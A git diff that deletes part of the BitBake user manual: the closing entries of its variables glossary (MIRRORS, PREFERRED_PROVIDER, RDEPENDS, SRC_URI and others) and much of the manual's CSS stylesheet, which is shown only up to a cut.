-                    You must also use the specific layer name as a suffix
-                    to the variable (e.g. <filename>LAYERDEPENDS_mylayer</filename>).</para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-LICENSE'><glossterm>LICENSE</glossterm>
-            <glossdef>
-                <para>
-                    The list of source licenses for the recipe.
-                </para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-    <glossdiv id='var-bb-glossary-m'><title>M</title>
-
-        <glossentry id='var-bb-MIRRORS'><glossterm>MIRRORS</glossterm>
-            <glossdef>
-                <para>
-                    Specifies additional paths from which BitBake gets source code.
-                    When the build system searches for source code, it first
-                    tries the local download directory.
-                    If that location fails, the build system tries locations
-                    defined by
-                    <link linkend='var-bb-PREMIRRORS'><filename>PREMIRRORS</filename></link>,
-                    the upstream source, and then locations specified by
-                    <filename>MIRRORS</filename> in that order.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-MULTI_PROVIDER_WHITELIST'><glossterm>MULTI_PROVIDER_WHITELIST</glossterm>
-            <glossdef>
-                <para>
-                    Allows you to suppress BitBake warnings caused when
-                    building two separate recipes that provide the same
-                    output.
-                </para>
-
-                <para>
-                    BitBake normally issues a warning when building two
-                    different recipes where each provides the same output.
-                    This scenario is usually something the user does not
-                    want.
-                    However, cases do exist where it makes sense, particularly
-                    in the <filename>virtual/*</filename> namespace.
-                    You can use this variable to suppress BitBake's warnings.
-                </para>
-
-                <para>
-                    To use the variable, list provider names (e.g.
-                    recipe names, <filename>virtual/kernel</filename>,
-                    and so forth).
-                </para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-<!--
-    <glossdiv id='var-glossary-n'><title>N</title>
-    </glossdiv>
--->
-
-    <glossdiv id='var-bb-glossary-o'><title>O</title>
-
-        <glossentry id='var-bb-OVERRIDES'><glossterm>OVERRIDES</glossterm>
-            <glossdef>
-                <para>
-                    BitBake uses <filename>OVERRIDES</filename> to control
-                    what variables are overridden after BitBake parses
-                    recipes and configuration files.
-                </para>
-
-                <para>
-                    Following is a simple example that uses an overrides
-                    list based on machine architectures:
-                    <literallayout class='monospaced'>
-     OVERRIDES = "arm:x86:mips:powerpc"
-                    </literallayout>
-                    You can find information on how to use
-                    <filename>OVERRIDES</filename> in the
-                    "<link linkend='conditional-syntax-overrides'>Conditional Syntax (Overrides)</link>"
-                    section.
-                </para>
-            </glossdef>
-        </glossentry>
-    </glossdiv>
-
-    <glossdiv id='var-bb-glossary-p'><title>P</title>
-
-        <glossentry id='var-bb-P4DIR'><glossterm>P4DIR</glossterm>
-            <glossdef>
-                <para>
-                    The directory in which a local copy of a Perforce depot
-                    is stored when it is fetched.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-PACKAGES'><glossterm>PACKAGES</glossterm>
-            <glossdef>
-                <para>The list of packages the recipe creates.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-PACKAGES_DYNAMIC'><glossterm>PACKAGES_DYNAMIC</glossterm>
-            <glossdef>
-                <para>
-                    A promise that your recipe satisfies runtime dependencies
-                    for optional modules that are found in other recipes.
-                    <filename>PACKAGES_DYNAMIC</filename>
-                    does not actually satisfy the dependencies, it only states that
-                    they should be satisfied.
-                    For example, if a hard, runtime dependency
-                    (<link linkend='var-bb-RDEPENDS'><filename>RDEPENDS</filename></link>)
-                    of another package is satisfied during the build
-                    through the <filename>PACKAGES_DYNAMIC</filename>
-                    variable, but a package with the module name is never actually
-                    produced, then the other package will be broken.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-PE'><glossterm>PE</glossterm>
-            <glossdef>
-                <para>
-                    The epoch of the recipe.
-                    By default, this variable is unset.
-                    The variable is used to make upgrades possible when the
-                    versioning scheme changes in some backwards incompatible
-                    way.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-PERSISTENT_DIR'><glossterm>PERSISTENT_DIR</glossterm>
-            <glossdef>
-                <para>
-                    Specifies the directory BitBake uses to store data that
-                    should be preserved between builds.
-                    In particular, the data stored is the data that uses
-                    BitBake's persistent data API and the data used by the
-                    PR Server and PR Service.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-PF'><glossterm>PF</glossterm>
-            <glossdef>
-                <para>
-                    Specifies the recipe or package name and includes all version and revision
-                    numbers (i.e. <filename>eglibc-2.13-r20+svnr15508/</filename> and
-                    <filename>bash-4.2-r1/</filename>).
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-PN'><glossterm>PN</glossterm>
-            <glossdef>
-                <para>The recipe name.</para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-PR'><glossterm>PR</glossterm>
-            <glossdef>
-                <para>The revision of the recipe.
-                    </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-PREFERRED_PROVIDER'><glossterm>PREFERRED_PROVIDER</glossterm>
-            <glossdef>
-                <para>
-                    Determines which recipe should be given preference when
-                    multiple recipes provide the same item.
-                    You should always suffix the variable with the name of the
-                    provided item, and you should set it to the
-                    <link linkend='var-bb-PN'><filename>PN</filename></link>
-                    of the recipe to which you want to give precedence.
-                    Some examples:
-                    <literallayout class='monospaced'>
-     PREFERRED_PROVIDER_virtual/kernel ?= "linux-yocto"
-     PREFERRED_PROVIDER_virtual/xserver = "xserver-xf86"
-     PREFERRED_PROVIDER_virtual/libgl ?= "mesa"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-PREFERRED_PROVIDERS'><glossterm>PREFERRED_PROVIDERS</glossterm>
-            <glossdef>
-                <para>
-                    Determines which recipe should be given preference for
-                    cases where multiple recipes provide the same item.
-                    Functionally,
-                    <filename>PREFERRED_PROVIDERS</filename> is identical to
-                    <link linkend='var-bb-PREFERRED_PROVIDER'><filename>PREFERRED_PROVIDER</filename></link>.
-                    However, the <filename>PREFERRED_PROVIDERS</filename>
-                    variable lets you define preferences for multiple
-                    situations using the following form:
-                    <literallayout class='monospaced'>
-     PREFERRED_PROVIDERS = "xxx:yyy aaa:bbb ..."
-                    </literallayout>
-                    This form is a convenient replacement for the following:
-                    <literallayout class='monospaced'>
-     PREFERRED_PROVIDER_xxx = "yyy"
-     PREFERRED_PROVIDER_aaa = "bbb"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-PREFERRED_VERSION'><glossterm>PREFERRED_VERSION</glossterm>
-            <glossdef>
-                <para>
-                    If there are multiple versions of recipes available, this
-                    variable determines which recipe should be given preference.
-                    You must always suffix the variable with the
-                    <link linkend='var-bb-PN'><filename>PN</filename></link>
-                    you want to select, and you should set
-                    <link linkend='var-bb-PV'><filename>PV</filename></link>
-                    accordingly for precedence.
-                </para>
-
-                <para>
-                    The <filename>PREFERRED_VERSION</filename> variable
-                    supports limited wildcard use through the
-                    "<filename>%</filename>" character.
-                    You can use the character to match any number of
-                    characters, which can be useful when specifying versions
-                    that contain long revision numbers that potentially change.
-                    Here are two examples:
-                    <literallayout class='monospaced'>
-     PREFERRED_VERSION_python = "2.7.3"
-     PREFERRED_VERSION_linux-yocto = "4.12%"
-                    </literallayout>
-                    <note><title>Important</title>
-                        The use of the "<filename>%</filename>" character
-                        is limited in that it only works at the end of the
-                        string.
-                        You cannot use the wildcard character in any other
-                        location of the string.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-PREMIRRORS'><glossterm>PREMIRRORS</glossterm>
-            <glossdef>
-                <para>
-                    Specifies additional paths from which BitBake gets source code.
-                    When the build system searches for source code, it first
-                    tries the local download directory.
-                    If that location fails, the build system tries locations
-                    defined by <filename>PREMIRRORS</filename>, the upstream
-                    source, and then locations specified by
-                    <link linkend='var-bb-MIRRORS'><filename>MIRRORS</filename></link>
-                    in that order.
-                </para>
-
-                <para>
-                    Typically, you would add a specific server for the
-                    build system to attempt before any others by adding
-                    something like the following to your configuration:
-                    <literallayout class='monospaced'>
-     PREMIRRORS_prepend = "\
-     git://.*/.* http://www.yoctoproject.org/sources/ \n \
-     ftp://.*/.* http://www.yoctoproject.org/sources/ \n \
-     http://.*/.* http://www.yoctoproject.org/sources/ \n \
-     https://.*/.* http://www.yoctoproject.org/sources/ \n"
-                    </literallayout>
-                    These changes cause the build system to intercept
-                    Git, FTP, HTTP, and HTTPS requests and direct them to
-                    the <filename>http://</filename> sources mirror.
-                    You can use <filename>file://</filename> URLs to point
-                    to local directories or network shares as well.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-PROVIDES'><glossterm>PROVIDES</glossterm>
-            <glossdef>
-                <para>
-                    A list of aliases by which a particular recipe can be
-                    known.
-                    By default, a recipe's own
-                    <filename><link linkend='var-bb-PN'>PN</link></filename>
-                    is implicitly already in its <filename>PROVIDES</filename>
-                    list.
-                    If a recipe uses <filename>PROVIDES</filename>, the
-                    additional aliases are synonyms for the recipe and can
-                    be useful satisfying dependencies of other recipes during
-                    the build as specified by
-                    <filename><link linkend='var-bb-DEPENDS'>DEPENDS</link></filename>.
-                </para>
-
-                <para>
-                    Consider the following example
-                    <filename>PROVIDES</filename> statement from a recipe
-                    file <filename>libav_0.8.11.bb</filename>:
-                    <literallayout class='monospaced'>
-     PROVIDES += "libpostproc"
-                    </literallayout>
-                    The <filename>PROVIDES</filename> statement results in
-                    the "libav" recipe also being known as "libpostproc".
-                </para>
-
-                <para>
-                    In addition to providing recipes under alternate names,
-                    the <filename>PROVIDES</filename> mechanism is also used
-                    to implement virtual targets.
-                    A virtual target is a name that corresponds to some
-                    particular functionality (e.g. a Linux kernel).
-                    Recipes that provide the functionality in question list the
-                    virtual target in <filename>PROVIDES</filename>.
-                    Recipes that depend on the functionality in question can
-                    include the virtual target in
-                    <link linkend='var-bb-DEPENDS'><filename>DEPENDS</filename></link>
-                    to leave the choice of provider open.
-                </para>
-
-                <para>
-                    Conventionally, virtual targets have names on the form
-                    "virtual/function" (e.g. "virtual/kernel").
-                    The slash is simply part of the name and has no
-                    syntactical significance.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-PRSERV_HOST'><glossterm>PRSERV_HOST</glossterm>
-            <glossdef>
-                <para>
-                    The network based
-                    <link linkend='var-bb-PR'><filename>PR</filename></link>
-                    service host and port.
-                </para>
-
-                <para>
-                    Following is an example of how the <filename>PRSERV_HOST</filename> variable is
-                    set:
-                    <literallayout class='monospaced'>
-     PRSERV_HOST = "localhost:0"
-                    </literallayout>
-                    You must set the variable if you want to automatically
-                    start a local PR service.
-                    You can set <filename>PRSERV_HOST</filename> to other
-                    values to use a remote PR service.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-PV'><glossterm>PV</glossterm>
-            <glossdef>
-                <para>The version of the recipe.
-                 </para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-<!--
-    <glossdiv id='var-glossary-q'><title>Q</title>
-    </glossdiv>
--->
-
-    <glossdiv id='var-bb-glossary-r'><title>R</title>
-
-        <glossentry id='var-bb-RDEPENDS'><glossterm>RDEPENDS</glossterm>
-            <glossdef>
-                <para>
-                    Lists a package's runtime dependencies (i.e. other packages)
-                    that must be installed in order for the built package to run
-                    correctly.
-                    If a package in this list cannot be found during the build,
-                    you will get a build error.
-                </para>
-
-                <para>
-                    Because the <filename>RDEPENDS</filename> variable applies
-                    to packages being built, you should always use the variable
-                    in a form with an attached package name.
-                    For example, suppose you are building a development package
-                    that depends on the <filename>perl</filename> package.
-                    In this case, you would use the following
-                    <filename>RDEPENDS</filename> statement:
-                    <literallayout class='monospaced'>
-     RDEPENDS_${PN}-dev += "perl"
-                    </literallayout>
-                    In the example, the development package depends on
-                    the <filename>perl</filename> package.
-                    Thus, the <filename>RDEPENDS</filename> variable has the
-                    <filename>${PN}-dev</filename> package name as part of the
-                    variable.
-                </para>
-
-                <para>
-                    BitBake supports specifying versioned dependencies.
-                    Although the syntax varies depending on the packaging
-                    format, BitBake hides these differences from you.
-                    Here is the general syntax to specify versions with
-                    the <filename>RDEPENDS</filename> variable:
-                    <literallayout class='monospaced'>
-     RDEPENDS_${PN} = "<replaceable>package</replaceable> (<replaceable>operator</replaceable> <replaceable>version</replaceable>)"
-                    </literallayout>
-                    For <filename>operator</filename>, you can specify the
-                    following:
-                    <literallayout class='monospaced'>
-     =
-     &lt;
-     &gt;
-     &lt;=
-     &gt;=
-                    </literallayout>
-                    For example, the following sets up a dependency on version
-                    1.2 or greater of the package <filename>foo</filename>:
-                    <literallayout class='monospaced'>
-     RDEPENDS_${PN} = "foo (>= 1.2)"
-                    </literallayout>
-                </para>
-
-                <para>
-                    For information on build-time dependencies, see the
-                    <link linkend='var-bb-DEPENDS'><filename>DEPENDS</filename></link>
-                    variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-REPODIR'><glossterm>REPODIR</glossterm>
-            <glossdef>
-                <para>
-                    The directory in which a local copy of a
-                    <filename>google-repo</filename> directory is stored
-                    when it is synced.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-RPROVIDES'><glossterm>RPROVIDES</glossterm>
-            <glossdef>
-                <para>
-                    A list of package name aliases that a package also provides.
-                    These aliases are useful for satisfying runtime dependencies
-                    of other packages both during the build and on the target
-                    (as specified by
-                    <filename><link linkend='var-bb-RDEPENDS'>RDEPENDS</link></filename>).
-                </para>
-                <para>
-                   As with all package-controlling variables, you must always
-                   use the variable in conjunction with a package name override.
-                   Here is an example:
-                   <literallayout class='monospaced'>
-     RPROVIDES_${PN} = "widget-abi-2"
-                   </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-RRECOMMENDS'><glossterm>RRECOMMENDS</glossterm>
-            <glossdef>
-                <para>
-                    A list of packages that extends the usability of a package
-                    being built.
-                    The package being built does not depend on this list of
-                    packages in order to successfully build, but needs them for
-                    the extended usability.
-                    To specify runtime dependencies for packages, see the
-                    <filename><link linkend='var-bb-RDEPENDS'>RDEPENDS</link></filename>
-                    variable.
-                </para>
-
-                <para>
-                    BitBake supports specifying versioned recommends.
-                    Although the syntax varies depending on the packaging
-                    format, BitBake hides these differences from you.
-                    Here is the general syntax to specify versions with
-                    the <filename>RRECOMMENDS</filename> variable:
-                    <literallayout class='monospaced'>
-     RRECOMMENDS_${PN} = "<replaceable>package</replaceable> (<replaceable>operator</replaceable> <replaceable>version</replaceable>)"
-                    </literallayout>
-                    For <filename>operator</filename>, you can specify the
-                    following:
-                    <literallayout class='monospaced'>
-     =
-     &lt;
-     &gt;
-     &lt;=
-     &gt;=
-                    </literallayout>
-                    For example, the following sets up a recommend on version
-                    1.2 or greater of the package <filename>foo</filename>:
-                    <literallayout class='monospaced'>
-     RRECOMMENDS_${PN} = "foo (>= 1.2)"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-    <glossdiv id='var-bb-glossary-s'><title>S</title>
-
-        <glossentry id='var-bb-SECTION'><glossterm>SECTION</glossterm>
-            <glossdef>
-                <para>The section in which packages should be categorized.</para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-SRC_URI'><glossterm>SRC_URI</glossterm>
-            <glossdef>
-                <para>
-                    The list of source files - local or remote.
-                    This variable tells BitBake which bits
-                    to pull for the build and how to pull them.
-                    For example, if the recipe or append file needs to
-                    fetch a single tarball from the Internet, the recipe or
-                    append file uses a <filename>SRC_URI</filename>
-                    entry that specifies that tarball.
-                    On the other hand, if the recipe or append file needs to
-                    fetch a tarball and include a custom file, the recipe or
-                    append file needs an <filename>SRC_URI</filename> variable
-                    that specifies all those sources.</para>
-                <para>The following list explains the available URI protocols:
-                    <itemizedlist>
-                        <listitem><para><emphasis><filename>file://</filename> -</emphasis>
-                            Fetches files, which are usually files shipped with
-                            the metadata,
-                            from the local machine.
-                            The path is relative to the
-                            <link linkend='var-bb-FILESPATH'><filename>FILESPATH</filename></link>
-                            variable.</para></listitem>
-                        <listitem><para><emphasis><filename>bzr://</filename> -</emphasis> Fetches files from a
-                            Bazaar revision control repository.</para></listitem>
-                        <listitem><para><emphasis><filename>git://</filename> -</emphasis> Fetches files from a
-                            Git revision control repository.</para></listitem>
-                        <listitem><para><emphasis><filename>osc://</filename> -</emphasis> Fetches files from
-                            an OSC (OpenSUSE Build service) revision control repository.</para></listitem>
-                        <listitem><para><emphasis><filename>repo://</filename> -</emphasis> Fetches files from
-                            a repo (Git) repository.</para></listitem>
-                        <listitem><para><emphasis><filename>http://</filename> -</emphasis> Fetches files from
-                            the Internet using HTTP.</para></listitem>
-                        <listitem><para><emphasis><filename>https://</filename> -</emphasis> Fetches files
-                            from the Internet using HTTPS.</para></listitem>
-                        <listitem><para><emphasis><filename>ftp://</filename> -</emphasis> Fetches files
-                            from the Internet using FTP.</para></listitem>
-                        <listitem><para><emphasis><filename>cvs://</filename> -</emphasis> Fetches files from
-                            a CVS revision control repository.</para></listitem>
-                        <listitem><para><emphasis><filename>hg://</filename> -</emphasis> Fetches files from
-                            a Mercurial (<filename>hg</filename>) revision control repository.</para></listitem>
-                        <listitem><para><emphasis><filename>p4://</filename> -</emphasis> Fetches files from
-                            a Perforce (<filename>p4</filename>) revision control repository.</para></listitem>
-                        <listitem><para><emphasis><filename>ssh://</filename> -</emphasis> Fetches files from
-                            a secure shell.</para></listitem>
-                        <listitem><para><emphasis><filename>svn://</filename> -</emphasis> Fetches files from
-                            a Subversion (<filename>svn</filename>) revision control repository.</para></listitem>
-                    </itemizedlist>
-                </para>
-                <para>Here are some additional options worth mentioning:
-                    <itemizedlist>
-                        <listitem><para><emphasis><filename>unpack</filename> -</emphasis> Controls
-                            whether or not to unpack the file if it is an archive.
-                            The default action is to unpack the file.</para></listitem>
-                        <listitem><para><emphasis><filename>subdir</filename> -</emphasis> Places the file
-                            (or extracts its contents) into the specified
-                            subdirectory.
-                            This option is useful for unusual tarballs or other archives that
-                            do not have their files already in a subdirectory within the archive.
-                            </para></listitem>
-                        <listitem><para><emphasis><filename>name</filename> -</emphasis> Specifies a
-                            name to be used for association with <filename>SRC_URI</filename> checksums
-                            when you have more than one file specified in <filename>SRC_URI</filename>.
-                            </para></listitem>
-                        <listitem><para><emphasis><filename>downloadfilename</filename> -</emphasis> Specifies
-                            the filename used when storing the downloaded file.</para></listitem>
-                    </itemizedlist>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-SRCDATE'><glossterm>SRCDATE</glossterm>
-            <glossdef>
-                <para>
-                    The date of the source code used to build the package.
-                    This variable applies only if the source was fetched from a Source Code Manager (SCM).
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-SRCREV'><glossterm>SRCREV</glossterm>
-            <glossdef>
-                <para>
-                    The revision of the source code used to build the package.
-                    This variable applies only when using Subversion, Git, Mercurial and Bazaar.
-                    If you want to build a fixed revision and you want
-                    to avoid performing a query on the remote repository every time
-                    BitBake parses your recipe, you should specify a <filename>SRCREV</filename> that is a
-                    full revision identifier and not just a tag.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-SRCREV_FORMAT'><glossterm>SRCREV_FORMAT</glossterm>
-            <glossdef>
-                <para>
-                    Helps construct valid
-                    <link linkend='var-bb-SRCREV'><filename>SRCREV</filename></link>
-                    values when multiple source controlled URLs are used in
-                    <link linkend='var-bb-SRC_URI'><filename>SRC_URI</filename></link>.
-                </para>
-
-                <para>
-                    The system needs help constructing these values under these
-                    circumstances.
-                    Each component in the <filename>SRC_URI</filename>
-                    is assigned a name and these are referenced
-                    in the <filename>SRCREV_FORMAT</filename> variable.
-                    Consider an example with URLs named "machine" and "meta".
-                    In this case, <filename>SRCREV_FORMAT</filename> could look
-                    like "machine_meta" and those names would have the SCM
-                    versions substituted into each position.
-                    Only one <filename>AUTOINC</filename> placeholder is added
-                    and if needed.
-                    And, this placeholder is placed at the start of the
-                    returned string.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-STAMP'><glossterm>STAMP</glossterm>
-            <glossdef>
-                <para>
-                    Specifies the base path used to create recipe stamp files.
-                    The path to an actual stamp file is constructed by evaluating this
-                    string and then appending additional information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-STAMPCLEAN'><glossterm>STAMPCLEAN</glossterm>
-            <glossdef>
-                <para>
-                    Specifies the base path used to create recipe stamp files.
-                    Unlike the
-                    <link linkend='var-bb-STAMP'><filename>STAMP</filename></link>
-                    variable, <filename>STAMPCLEAN</filename> can contain
-                    wildcards to match the range of files a clean operation
-                    should remove.
-                    BitBake uses a clean operation to remove any other stamps
-                    it should be removing when creating a new stamp.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-SUMMARY'><glossterm>SUMMARY</glossterm>
-            <glossdef>
-                <para>
-                    A short summary for the recipe, which is 72 characters or less.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-SVNDIR'><glossterm>SVNDIR</glossterm>
-            <glossdef>
-                <para>
-                    The directory in which files checked out of a Subversion
-                    system are stored.
-                </para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-    <glossdiv id='var-bb-glossary-t'><title>T</title>
-
-        <glossentry id='var-bb-T'><glossterm>T</glossterm>
-            <glossdef>
-                <para>Points to a directory were BitBake places
-                    temporary files, which consist mostly of task logs and
-                    scripts, when building a particular recipe.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-bb-TOPDIR'><glossterm>TOPDIR</glossterm>
-            <glossdef>
-                <para>
-                    Points to the build directory.
-                    BitBake automatically sets this variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-<!--
-    <glossdiv id='var-glossary-u'><title>U</title>
-    </glossdiv>
-
-    <glossdiv id='var-glossary-v'><title>V</title>
-   </glossdiv>
-
-    <glossdiv id='var-glossary-w'><title>W</title>
-    </glossdiv>
-
-    <glossdiv id='var-glossary-x'><title>X</title>
-    </glossdiv>
-
-    <glossdiv id='var-glossary-y'><title>Y</title>
-    </glossdiv>
-
-    <glossdiv id='var-glossary-z'><title>Z</title>
-    </glossdiv>
--->
-
-
-</glossary>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-style.css b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-style.css
deleted file mode 100644
index 65da2a4e31..0000000000
--- a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-style.css
+++ /dev/null
@@ -1,984 +0,0 @@
-/*
-   Generic XHTML / DocBook XHTML CSS Stylesheet.
-
-   Browser wrangling and typographic design by
-      Oyvind Kolas / pippin@gimp.org
-
-   Customised for Poky by
-      Matthew Allum / mallum@o-hand.com
-
-   Thanks to:
-     Liam R. E. Quin
-     William Skaggs
-     Jakub Steiner
-
-   Structure
-   ---------
-
-   The stylesheet is divided into the following sections:
-
-       Positioning
-          Margins, paddings, width, font-size, clearing.
-       Decorations
-          Borders, style
-       Colors
-          Colors
-       Graphics
-          Graphical backgrounds
-       Nasty IE tweaks
-          Workarounds needed to make it work in internet explorer,
-          currently makes the stylesheet non validating, but up until
-          this point it is validating.
-       Mozilla extensions
-          Transparency for footer
-	  Rounded corners on boxes
-
-*/
-
-
-  /*************** /
- /  Positioning   /
-/ ***************/
-
-body {
-  font-family: Verdana, Sans, sans-serif;
-
-  min-width: 640px;
-  width: 80%;
-  margin:  0em auto;
-  padding: 2em 5em 5em 5em;
-  color: #333;
-}
-
-h1,h2,h3,h4,h5,h6,h7 {
-  font-family: Arial, Sans;
-  color: #00557D;
-  clear: both;
-}
-
-h1 {
-  font-size: 2em;
-  text-align: left;
-  padding: 0em 0em 0em 0em;
-  margin: 2em 0em 0em 0em;
-}
-
-h2.subtitle {
-  margin: 0.10em 0em 3.0em 0em;
-  padding: 0em 0em 0em 0em;
-  font-size: 1.8em;
-  padding-left: 20%;
-  font-weight: normal;
-  font-style: italic;
-}
-
-h2 {
-  margin: 2em 0em 0.66em 0em;
-  padding: 0.5em 0em 0em 0em;
-  font-size: 1.5em;
-  font-weight: bold;
-}
-
-h3.subtitle {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-  font-size: 142.14%;
-  text-align: right;
-}
-
-h3 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 140%;
-  font-weight: bold;
-}
-
-h4 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 120%;
-  font-weight: bold;
-}
-
-h5 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 110%;
-  font-weight: bold;
-}
-
-h6 {
-  margin: 1em 0em 0em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 110%;
-  font-weight: bold;
-}
-
-.authorgroup {
-  background-color: transparent;
-  background-repeat: no-repeat;
-  padding-top: 256px;
-  background-image: url("figures/bitbake-title.png");
-  background-position: left top;
-  margin-top: -256px;
-  padding-right: 50px;
-  margin-left: 0px;
-  text-align: right;
-  width: 740px;
-}
-
-h3.author {
-  margin: 0em 0me 0em 0em;
-  padding: 0em 0em 0em 0em;
-  font-weight: normal;
-  font-size: 100%;
-  color: #333;
-  clear: both;
-}
-
-.author tt.email {
-  font-size: 66%;
-}
-
-.titlepage hr {
-  width: 0em;
-  clear: both;
-}
-
-.revhistory {
-  padding-top: 2em;
-  clear: both;
-}
-
-.toc,
-.list-of-tables,
-.list-of-examples,
-.list-of-figures {
-  padding: 1.33em 0em 2.5em 0em;
-  color: #00557D;
-}
-
-.toc p,
-.list-of-tables p,
-.list-of-figures p,
-.list-of-examples p {
-  padding: 0em 0em 0em 0em;
-  padding: 0em 0em 0.3em;
-  margin: 1.5em 0em 0em 0em;
-}
-
-.toc p b,
-.list-of-tables p b,
-.list-of-figures p b,
-.list-of-examples p b{
-  font-size: 100.0%;
-  font-weight: bold;
-}
-
-.toc dl,
-.list-of-tables dl,
-.list-of-figures dl,
-.list-of-examples dl {
-  margin: 0em 0em 0.5em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.toc dt {
-  margin: 0em 0em 0em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.toc dd {
-  margin: 0em 0em 0em 2.6em;
-  padding: 0em 0em 0em 0em;
-}
-
-div.glossary dl,
-div.variablelist dl {
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
-  font-weight: normal;
-  width: 20em;
-  text-align: right;
-}
-
-.variablelist dl dt {
-  margin-top: 0.5em;
-}
-
-.glossary dl dd,
-.variablelist dl dd {
-  margin-top: -1em;
-  margin-left: 25.5em;
-}
-
-.glossary dd p,
-.variablelist dd p {
-  margin-top: 0em;
-  margin-bottom: 1em;
-}
-
-
-div.calloutlist table td {
-  padding: 0em 0em 0em 0em;
-  margin: 0em 0em 0em 0em;
-}
-
-div.calloutlist table td p {
-  margin-top: 0em;
-  margin-bottom: 1em;
-}
-
-div p.copyright {
-  text-align: left;
-}
-
-div.legalnotice p.legalnotice-title {
-  margin-bottom: 0em;
-}
-
-p {
-  line-height: 1.5em;
-  margin-top: 0em;
-
-}
-
-dl {
-  padding-top: 0em;
-}
-
-hr {
-  border: solid 1px;
-}
-
-
-.mediaobject,
-.mediaobjectco {
-  text-align: center;
-}
-
-img {
-  border: none;
-}
-
-ul {
-  padding: 0em 0em 0em 1.5em;
-}
-
-ul li {
-  padding: 0em 0em 0em 0em;
-}
-
-ul li p {
-  text-align: left;
-}
-
-table {
-  width :100%;
-}
-
-th {
-  padding: 0.25em;
-  text-align: left;
-  font-weight: normal;
-  vertical-align: top;
-}
-
-td {
-  padding: 0.25em;
-  vertical-align: top;
-}
-
-p a[id] {
-  margin: 0px;
-  padding: 0px;
-  display: inline;
-  background-image: none;
-}
-
-a {
-  text-decoration: underline;
-  color: #444;
-}
-
-pre {
-    overflow: auto;
-}
-
-a:hover {
-  text-decoration: underline;
-  /*font-weight: bold;*/
-}
-
-/* This style defines how the permalink character
-   appears by itself and when hovered over with
-   the mouse. */
-
-[alt='Permalink'] { color: #eee; }
-[alt='Permalink']:hover { color: black; }
-
-
-div.informalfigure,
-div.informalexample,
-div.informaltable,
-div.figure,
-div.table,
-div.example {
-  margin: 1em 0em;
-  padding: 1em;
-  page-break-inside: avoid;
-}
-
-
-div.informalfigure p.title b,
-div.informalexample p.title b,
-div.informaltable p.title b,
-div.figure p.title b,
-div.example p.title b,
-div.table p.title b{
-    padding-top: 0em;
-    margin-top: 0em;
-    font-size: 100%;
-    font-weight: normal;
-}
-
-.mediaobject .caption,
-.mediaobject .caption p  {
-  text-align: center;
-  font-size: 80%;
-  padding-top: 0.5em;
-  padding-bottom: 0.5em;
-}
-
-.epigraph {
-  padding-left: 55%;
-  margin-bottom: 1em;
-}
-
-.epigraph p {
-  text-align: left;
-}
-
-.epigraph .quote {
-  font-style: italic;
-}
-.epigraph .attribution {
-  font-style: normal;
-  text-align: right;
-}
-
-span.application {
-  font-style: italic;
-}
-
-.programlisting {
-  font-family: monospace;
-  font-size: 80%;
-  white-space: pre;
-  margin: 1.33em 0em;
-  padding: 1.33em;
-}
-
-.tip,
-.warning,
-.caution,
-.note {
-  margin-top: 1em;
-  margin-bottom: 1em;
-
-}
-
-/* force full width of table within div */
-.tip table,
-.warning table,
-.caution table,
-.note table {
-  border: none;
-  width: 100%;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  padding: 0.8em 0.0em 0.0em 0.0em;
